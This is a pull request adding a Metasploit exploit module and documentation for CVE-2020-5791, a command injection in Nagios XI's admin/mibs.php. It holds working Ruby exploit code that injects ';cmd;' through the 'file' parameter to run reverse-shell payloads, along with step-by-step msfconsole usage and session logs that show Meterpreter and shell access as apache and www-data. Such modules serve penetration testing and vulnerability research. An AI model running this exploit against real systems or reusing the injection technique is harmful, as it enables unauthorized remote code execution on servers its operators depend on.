### PR TITLE
Add Nagios XI Mibs.php Authenticated RCE module and docs (CVE-2020-5791)

### DIFF
--- a/documentation/modules/exploit/linux/http/nagios_xi_mibs_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_mibs_authenticated_rce.md
@@ -1,6 +1,8 @@
 ## Vulnerable Application
-This module exploits an OS command injection vulnerability (CVE-2020-5791) in `admin/mibs.php` that enables
-an authenticated user with admin privileges to achieve remote code execution as the `apache` user.
+This module exploits CVE-2020-5791, an OS command injection vulnerability in `admin/mibs.php` that enables
+an authenticated user with admin privileges to achieve remote code execution as either the `apache` user or the
+`www-data` user on NagiosXI 5.6.0 to 5.7.3 inclusive (exact user depends on the version of NagiosXI
+installed as well as the OS its installed on).
 
 The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate to the target and
 obtain the Nagios XI version number, which is then used to check if the target is version 5.6.0-5.7.3 and therefore vulnerable.
@@ -14,7 +16,7 @@ However, the only reliable `cmd/unix` payloads against a typical Nagios XI host 
 Valid credentials for a Nagios XI admin user are required.
 This module has been successfully tested against Nagios XI 5.7.3 running on CentOS 7.
 
-Vulnerable software for testing is vavailable [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
+Vulnerable software for testing is available [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
 Detailed installation instructions are available
 [here](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf)
 and an official video tutorial is available [here](https://www.youtube.com/watch?v=fBWA6t6dJ4I).
@@ -23,8 +25,8 @@ and an official video tutorial is available [here](https://www.youtube.com/watch
 1. Start msfconsole
 2. Do: `use exploit/linux/http/nagios_xi_mibs_authenticated_rce`
 3. Do: `set RHOSTS [IP]`
-4. Do: `set USERNAME [username for the Nagios XI account]`
-5. Do: `set PASSWORD [password for the Nagios XI account]`
+4. Do: `set USERNAME [username for the Nagios XI account with administrative privileges]`
+5. Do: `set PASSWORD [password for the Nagios XI account with administrative privileges]`
 6. Do: `set target [target]`
 7. Do: `set payload [payload]`
 8. Do: `set LHOST [IP]`
@@ -45,14 +47,14 @@ The username for the Nagios XI account to authenticate with. The default value i
 ```
 Id  Name
 --  ----
-0   Linux
+0   Linux (x86/x64)
 1   CMD
 ```
 
 ## Scenarios
 ### Nagios XI 5.7.3 running on CentOS 7 - Linux target
 ```
-msf6 > use exploit/linux/http/nagios_xi_mibs_authenticated_rce 
+msf6 > use exploit/linux/http/nagios_xi_mibs_authenticated_rce
 [*] Using configured payload linux/x86/meterpreter/reverse_tcp
 msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set rhosts 192.168.1.16
 rhosts => 192.168.1.16
@@ -60,7 +62,7 @@ msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set lhost 192.168.1.
 lhost => 192.168.1.12
 msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set password nagiosadmin
 password => nagiosadmin
-msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options 
+msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options
 
 Module options (exploit/linux/http/nagios_xi_mibs_authenticated_rce):
 
@@ -97,12 +99,12 @@ Exploit target:
 
    Id  Name
    --  ----
-   0   Linux
+   0   Linux (x86/x64)
 
 
 msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run
 
-[*] Started reverse TCP handler on 192.168.1.12:4444 
+[*] Started reverse TCP handler on 192.168.1.12:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [*] Attempting to authenticate to Nagios XI...
 [+] Successfully authenticated to Nagios XI
@@ -117,7 +119,7 @@ Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=4
 ```
 ### Nagios XI 5.7.3 running on CentOS 7 - CMD target
 ```
-msf6 > use exploit/linux/http/nagios_xi_mibs_authenticated_rce 
+msf6 > use exploit/linux/http/nagios_xi_mibs_authenticated_rce
 [*] Using configured payload linux/x86/meterpreter/reverse_tcp
 msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set rhosts 192.168.1.16
 rhosts => 192.168.1.16
@@ -127,7 +129,7 @@ msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set password nagiosa
 password => nagiosadmin
 msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set target 1
 target => 1
-msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options 
+msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options
 
 Module options (exploit/linux/http/nagios_xi_mibs_authenticated_rce):
 
@@ -169,7 +171,7 @@ Exploit target:
 
 msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run
 
-[*] Started reverse SSL handler on 192.168.1.12:4444 
+[*] Started reverse SSL handler on 192.168.1.12:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [*] Attempting to authenticate to Nagios XI...
 [+] Successfully authenticated to Nagios XI
@@ -180,4 +182,39 @@ msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run
 
 id
 uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
+```
+
+### Nagios 5.6.5 on Ubuntu 20.04 LTS
+```
+msf6 > use exploit/linux/http/nagios_xi_mibs_authenticated_rce
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set RHOSTS 172.19.34.88
+RHOSTS => 172.19.34.88
+msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set PASSWORD nagiosadmin
+PASSWORD => nagiosadmin
+msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set LHOST 172.19.37.24
+LHOST => 172.19.37.24
+msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > exploit
+
+[*] Started reverse TCP handler on 172.19.37.24:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[*] Attempting to authenticate to Nagios XI...
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.6.5
+[+] The target appears to be vulnerable.
+[*] Command Stager progress - 100.00% done (773/773 bytes)
+[*] Sending stage (980808 bytes) to 172.19.34.88
+[*] Meterpreter session 1 opened (172.19.37.24:4444 -> 172.19.34.88:49942) at 2021-04-16 12:40:40 -0500
+
+meterpreter > getuid
+Server username: www-data @ test-Virtual-Machine (uid=33, gid=33, euid=33, egid=33)
+meterpreter > getprivs
+[-] The "getprivs" command is not supported by this Meterpreter type (x86/linux)
+meterpreter > shell
+Process 11695 created.
+Channel 1 created.
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data),132(Debian-snmp),1001(nagios),1002(nagcmd)
+whoami
+www-data
 ```

--- a/documentation/modules/exploit/linux/http/nagios_xi_mibs_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_mibs_authenticated_rce.md
@@ -3,7 +3,7 @@ This module exploits an OS command injection vulnerability (CVE-2020-5791) in `a
 an authenticated user with admin privileges to achieve remote code execution as the `apache` user.
 
 The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate to the target and
-obtain the Nagios XI version number, which is then used to check if the target is version 5.7.3 and therefore vulnerable.
+obtain the Nagios XI version number, which is then used to check if the target is version 5.6.0-5.7.3 and therefore vulnerable.
 
 Next, the module executes the payload via an HTTP GET request to `admin/mibs.php`.
 For this request, the value of the GET parameter `file` is set to the payload.
@@ -31,6 +31,9 @@ and an official video tutorial is available [here](https://www.youtube.com/watch
 9. Do: `exploit`
 
 ## Options
+### FINISH_INSTALL
+If this is set to `true`, the module will try to finish installing Nagios XI on targets where the installation has not been completed.
+This includes signing the license agreement. The default value is `false`.
 ### PASSWORD
 The password for the Nagios XI account to authenticate with.
 ### TARGETURI
@@ -49,24 +52,37 @@ Id  Name
 ## Scenarios
 ### Nagios XI 5.7.3 running on CentOS 7 - Linux target
 ```
+msf6 > use exploit/linux/http/nagios_xi_mibs_authenticated_rce 
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set rhosts 192.168.1.16
+rhosts => 192.168.1.16
+msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set lhost 192.168.1.12
+lhost => 192.168.1.12
+msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set password nagiosadmin
+password => nagiosadmin
 msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options 
 
 Module options (exploit/linux/http/nagios_xi_mibs_authenticated_rce):
 
-   Name       Current Setting  Required  Description
-   ----       ---------------  --------  -----------
-   PASSWORD   nagiosadmin      yes       Password to authenticate with
-   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS     192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT      80               yes       The target port (TCP)
-   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
-   SRVPORT    8080             yes       The local port to listen on.
-   SSL        false            no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
-   TARGETURI  /nagiosxi/       yes       The base path to the NagiosXi application
-   URIPATH                     no        The URI to use for this exploit (default is random)
-   USERNAME   nagiosadmin      yes       Username to authenticate with
-   VHOST                       no        HTTP server virtual host
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
+                                              . This includes signing the license agreement.
+   PASSWORD        nagiosadmin      yes       Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS          192.168.1.16     yes       The target host(s), range CIDR identifier, or hosts file with synt
+                                              ax 'file:<path>'
+   RPORT           80               yes       The target port (TCP)
+   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
+                                              address on the local machine or 0.0.0.0 to listen on all addresses
+                                              .
+   SRVPORT         8080             yes       The local port to listen on.
+   SSL             false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   USERNAME        nagiosadmin      yes       Username to authenticate with
+   VHOST                            no        HTTP server virtual host
 
 
 Payload options (linux/x86/meterpreter/reverse_tcp):
@@ -88,27 +104,79 @@ msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run
 
 [*] Started reverse TCP handler on 192.168.1.12:4444 
 [*] Executing automatic check (disable AutoCheck to override)
+[*] Attempting to authenticate to Nagios XI...
 [+] Successfully authenticated to Nagios XI
 [*] Target is Nagios XI with version 5.7.3
 [+] The target appears to be vulnerable.
-[*] Sending stage (976712 bytes) to 192.168.1.14
+[*] Sending stage (980808 bytes) to 192.168.1.16
 [*] Command Stager progress - 100.00% done (773/773 bytes)
-[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.14:41960) at 2021-02-01 09:43:38 -0500
+[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.16:55158) at 2021-04-01 13:18:20 -0400
 
 meterpreter > getuid
 Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
 ```
 ### Nagios XI 5.7.3 running on CentOS 7 - CMD target
 ```
+msf6 > use exploit/linux/http/nagios_xi_mibs_authenticated_rce 
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set rhosts 192.168.1.16
+rhosts => 192.168.1.16
+msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set lhost 192.168.1.12
+lhost => 192.168.1.12
+msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set password nagiosadmin
+password => nagiosadmin
+msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set target 1
+target => 1
+msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options 
+
+Module options (exploit/linux/http/nagios_xi_mibs_authenticated_rce):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
+                                              . This includes signing the license agreement.
+   PASSWORD        nagiosadmin      yes       Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS          192.168.1.16     yes       The target host(s), range CIDR identifier, or hosts file with synt
+                                              ax 'file:<path>'
+   RPORT           80               yes       The target port (TCP)
+   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
+                                              address on the local machine or 0.0.0.0 to listen on all addresses
+                                              .
+   SRVPORT         8080             yes       The local port to listen on.
+   SSL             false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   USERNAME        nagiosadmin      yes       Username to authenticate with
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_perl_ssl):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   CMD
+
+
 msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run
 
 [*] Started reverse SSL handler on 192.168.1.12:4444 
 [*] Executing automatic check (disable AutoCheck to override)
+[*] Attempting to authenticate to Nagios XI...
 [+] Successfully authenticated to Nagios XI
 [*] Target is Nagios XI with version 5.7.3
 [+] The target appears to be vulnerable.
 [*] Executing the payload
-[*] Command shell session 2 opened (192.168.1.12:4444 -> 192.168.1.14:41962) at 2021-02-01 09:43:45 -0500
+[*] Command shell session 2 opened (192.168.1.12:4444 -> 192.168.1.16:55162) at 2021-04-01 13:18:31 -0400
 
 id
 uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)

--- a/documentation/modules/exploit/linux/http/nagios_xi_mibs_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_mibs_authenticated_rce.md
@@ -1,0 +1,115 @@
+## Vulnerable Application
+This module exploits an OS command injection vulnerability (CVE-2020-5791) in `admin/mibs.php` that enables
+an authenticated user with admin privileges to achieve remote code execution as the `apache` user.
+
+The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate to the target and
+obtain the Nagios XI version number, which is then used to check if the target is version 5.7.3 and therefore vulnerable.
+
+Next, the module executes the payload via an HTTP GET request to `admin/mibs.php`.
+For this request, the value of the GET parameter `file` is set to the payload.
+The module supports `linux/x64` and `linux/x86` payloads (target 0) as well as `cmd/unix` payloads (target 1),
+However, the only reliable `cmd/unix` payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be
+`cmd/unix/reverse_perl_ssl` and `cmd/unix/reverse_openssl`.
+
+Valid credentials for a Nagios XI admin user are required.
+This module has been successfully tested against Nagios XI 5.7.3 running on CentOS 7.
+
+Vulnerable software for testing is vavailable [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
+Detailed installation instructions are available
+[here](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf)
+and an official video tutorial is available [here](https://www.youtube.com/watch?v=fBWA6t6dJ4I).
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use exploit/linux/http/nagios_xi_mibs_authenticated_rce`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set USERNAME [username for the Nagios XI account]`
+5. Do: `set PASSWORD [password for the Nagios XI account]`
+6. Do: `set target [target]`
+7. Do: `set payload [payload]`
+8. Do: `set LHOST [IP]`
+9. Do: `exploit`
+
+## Options
+### PASSWORD
+The password for the Nagios XI account to authenticate with.
+### TARGETURI
+The base path to Nagios XI. The default value is `/nagiosxi/`.
+### USERNAME
+The username for the Nagios XI account to authenticate with. The default value is `nagiosadmin`.
+
+## Targets
+```
+Id  Name
+--  ----
+0   Linux
+1   CMD
+```
+
+## Scenarios
+### Nagios XI 5.7.3 running on CentOS 7 - Linux target
+```
+msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options 
+
+Module options (exploit/linux/http/nagios_xi_mibs_authenticated_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   nagiosadmin      yes       Password to authenticate with
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80               yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /nagiosxi/       yes       The base path to the NagiosXi application
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME   nagiosadmin      yes       Username to authenticate with
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux
+
+
+msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.12:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.7.3
+[+] The target appears to be vulnerable.
+[*] Sending stage (976712 bytes) to 192.168.1.14
+[*] Command Stager progress - 100.00% done (773/773 bytes)
+[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.14:41960) at 2021-02-01 09:43:38 -0500
+
+meterpreter > getuid
+Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
+```
+### Nagios XI 5.7.3 running on CentOS 7 - CMD target
+```
+msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run
+
+[*] Started reverse SSL handler on 192.168.1.12:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.7.3
+[+] The target appears to be vulnerable.
+[*] Executing the payload
+[*] Command shell session 2 opened (192.168.1.12:4444 -> 192.168.1.14:41962) at 2021-02-01 09:43:45 -0500
+
+id
+uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
+```

--- a/modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
@@ -1,0 +1,125 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::NagiosXi
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Nagios XI 5.7.3 - Mibs.php Authenticated Remote Code Exection',
+        'Description' => %q{
+          This module exploits an OS command injection vulnerability in `admin/mibs.php`
+          that enables an authenticated user with admin privileges to achieve remote
+          code execution as the `apache` user.
+
+          Valid credentials for a Nagios XI admin user are required. This module has
+          been successfully tested against Nagios XI 5.7.3 running on CentOS 7.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Chris Lyne', # discovery
+            'Matthew Aberegg', # PoC
+            'Erik Wynter' # @wyntererik - Metasploit'
+          ],
+        'References' =>
+          [
+            ['CVE', '2020-5791'],
+            ['EDB', '48959']
+          ],
+        'Platform' => %w[linux unix],
+        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD],
+        'Targets' =>
+          [
+            [
+              'Linux', {
+                'Arch' => [ARCH_X86, ARCH_X64],
+                'Platform' => 'linux',
+                'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
+              }
+            ],
+            [
+              'CMD', {
+                'Arch' => [ARCH_CMD],
+                'Platform' => 'unix',
+                # the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl
+                'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' }
+              }
+            ]
+          ],
+        'Privileged' => false,
+        'DisclosureDate' => '2020-10-20',
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options [
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', nil])
+    ]
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def check
+    # obtain cookies required for authentication
+    cookies = nagios_xi_login(username, password)
+    if cookies.instance_of? Msf::Exploit::CheckCode
+      return cookies
+    end
+
+    # authenticate and obtain the Nagios XI version
+    print_good('Successfully authenticated to Nagios XI')
+    version = nagios_xi_version_index(cookies)
+    if version.instance_of? Msf::Exploit::CheckCode
+      return version
+    end
+
+    print_status("Target is Nagios XI with version #{version}")
+
+    # check if the target is actually vulnerable
+    unless version == '5.7.3'
+      return Exploit::CheckCode::Safe
+    end
+
+    return Exploit::CheckCode::Appears
+  end
+
+  def execute_command(cmd, _opts = {})
+    # execute payload
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'mibs.php'),
+      'vars_get' =>
+      {
+        'mode' => 'undo-processing',
+        'type' => '1',
+        'file' => ";#{cmd};"
+      }
+    }, 0) # don't wait for a response from the target, otherwise the module will in most cases hang for a few seconds after executing the payload
+  end
+
+  def exploit
+    if target.arch.first == ARCH_CMD
+      print_status('Executing the payload')
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager(background: true)
+    end
+  end
+end

--- a/modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Nagios XI 5.7.3 - Mibs.php Authenticated Remote Code Exection',
+        'Name' => 'Nagios XI 5.6.0-5.7.3 - Mibs.php Authenticated Remote Code Exection',
         'Description' => %q{
           This module exploits an OS command injection vulnerability in `admin/mibs.php`
           that enables an authenticated user with admin privileges to achieve remote
@@ -58,7 +58,13 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         'Privileged' => false,
         'DisclosureDate' => '2020-10-20',
-        'DefaultTarget' => 0
+        'DefaultTarget' => 0,
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE, ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [REPEATABLE_SESSION]
+          }
       )
     )
 
@@ -76,28 +82,68 @@ class MetasploitModule < Msf::Exploit::Remote
     datastore['PASSWORD']
   end
 
+  def finish_install
+    datastore['FINISH_INSTALL']
+  end
+
   def check
-    # obtain cookies required for authentication
-    cookies = nagios_xi_login(username, password)
-    if cookies.instance_of? Msf::Exploit::CheckCode
-      return cookies
+    # Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
+    # an array containing the http response body of a get request to index.php and the session cookies
+    login_result, res_array = nagios_xi_login(username, password, finish_install)
+    case login_result
+    when 1..3 # An error occurred
+      return CheckCode::Unknown(res_array[0])
+    when 4 # Nagios XI is not fully installed
+      install_result = install_nagios_xi(password)
+      if install_result
+        return CheckCode::Unknown(install_result[1])
+      end
+
+      login_result, res_array = login_after_install_or_license(username, password, finish_install)
+      case login_result
+      when 1..3 # An error occurred
+        return CheckCode::Unknown(res_array[0])
+      when 4 # Nagios XI is still not fully installed
+        return CheckCode::Detected('Failed to install Nagios XI on the target.')
+      end
     end
 
-    # authenticate and obtain the Nagios XI version
+    # when 5 is excluded from the case statement above to prevent having to use this code block twice.
+    # Including when 5 would require using this code block once at the end of the `when 4` code block above, and once here.
+    if login_result == 5 # the Nagios XI license agreement has not been signed
+      auth_cookies, nsp = res_array
+      sign_license_result = sign_license_agreement(auth_cookies, nsp)
+      if sign_license_result
+        return CheckCode::Unknown(sign_license_result[1])
+      end
+
+      login_result, res_array = login_after_install_or_license(username, password, finish_install)
+      case login_result
+      when 1..3
+        return CheckCode::Unknown(res_array[0])
+      when 5 # the Nagios XI license agreement still has not been signed
+        return CheckCode::Detected('Failed to sign the license agreement.')
+      end
+    end
+
     print_good('Successfully authenticated to Nagios XI')
-    version = nagios_xi_version_index(cookies)
-    if version.instance_of? Msf::Exploit::CheckCode
-      return version
+
+    # Obtain the Nagios XI version
+    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
+
+    nagios_version = nagios_xi_version(res_array[0])
+    if nagios_version.nil?
+      return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
     end
 
-    print_status("Target is Nagios XI with version #{version}")
-
+    print_status("Target is Nagios XI with version #{nagios_version}")
     # check if the target is actually vulnerable
-    unless version == '5.7.3'
-      return Exploit::CheckCode::Safe
+    version = Rex::Version.new(nagios_version)
+    if version >= Rex::Version.new('5.6.0') && version <= Rex::Version.new('5.7.3')
+      return CheckCode::Appears
     end
 
-    return Exploit::CheckCode::Appears
+    return CheckCode::Safe
   end
 
   def execute_command(cmd, _opts = {})
@@ -105,6 +151,7 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'admin', 'mibs.php'),
+      'cookie' => @auth_cookies,
       'vars_get' =>
       {
         'mode' => 'undo-processing',

--- a/modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
@@ -17,9 +17,11 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Nagios XI 5.6.0-5.7.3 - Mibs.php Authenticated Remote Code Exection',
         'Description' => %q{
-          This module exploits an OS command injection vulnerability in `admin/mibs.php`
-          that enables an authenticated user with admin privileges to achieve remote
-          code execution as the `apache` user.
+          This module exploits CVE-2020-5791, an OS command injection vulnerability in
+          `admin/mibs.php` that enables an authenticated user with admin privileges to achieve
+          remote code execution as either the `apache` user or the `www-data` user on NagiosXI
+          version 5.6.0 to 5.7.3 inclusive (exact user depends on the version of NagiosXI
+          installed as well as the OS its installed on).
 
           Valid credentials for a Nagios XI admin user are required. This module has
           been successfully tested against Nagios XI 5.7.3 running on CentOS 7.
@@ -29,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Chris Lyne', # discovery
             'Matthew Aberegg', # PoC
-            'Erik Wynter' # @wyntererik - Metasploit'
+            'Erik Wynter' # @wyntererik - Metasploit
           ],
         'References' =>
           [
@@ -37,19 +39,19 @@ class MetasploitModule < Msf::Exploit::Remote
             ['EDB', '48959']
           ],
         'Platform' => %w[linux unix],
-        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD],
+        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
         'Targets' =>
           [
             [
-              'Linux', {
-                'Arch' => [ARCH_X86, ARCH_X64],
+              'Linux (x86/x64)', {
+                'Arch' => [ ARCH_X86, ARCH_X64 ],
                 'Platform' => 'linux',
                 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
               }
             ],
             [
               'CMD', {
-                'Arch' => [ARCH_CMD],
+                'Arch' => [ ARCH_CMD ],
                 'Platform' => 'unix',
                 # the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl
                 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' }
@@ -61,9 +63,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultTarget' => 0,
         'Notes' =>
           {
-            'Stability' => [ CRASH_SAFE, ],
+            'Stability' => [ CRASH_SAFE ],
             'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
-            'Reliability' => [REPEATABLE_SESSION]
+            'Reliability' => [ REPEATABLE_SESSION ]
           }
       )
     )
@@ -137,6 +139,11 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     print_status("Target is Nagios XI with version #{nagios_version}")
+
+    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
+      nagios_version = '1.0.0' # Set to really old version as a placeholder. Basically we don't want to exploit these versions.
+    end
+
     # check if the target is actually vulnerable
     version = Rex::Version.new(nagios_version)
     if version >= Rex::Version.new('5.6.0') && version <= Rex::Version.new('5.7.3')
@@ -155,7 +162,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_get' =>
       {
         'mode' => 'undo-processing',
-        'type' => '1',
+        'type' => '2',
         'file' => ";#{cmd};"
       }
     }, 0) # don't wait for a response from the target, otherwise the module will in most cases hang for a few seconds after executing the payload


### PR DESCRIPTION
## About
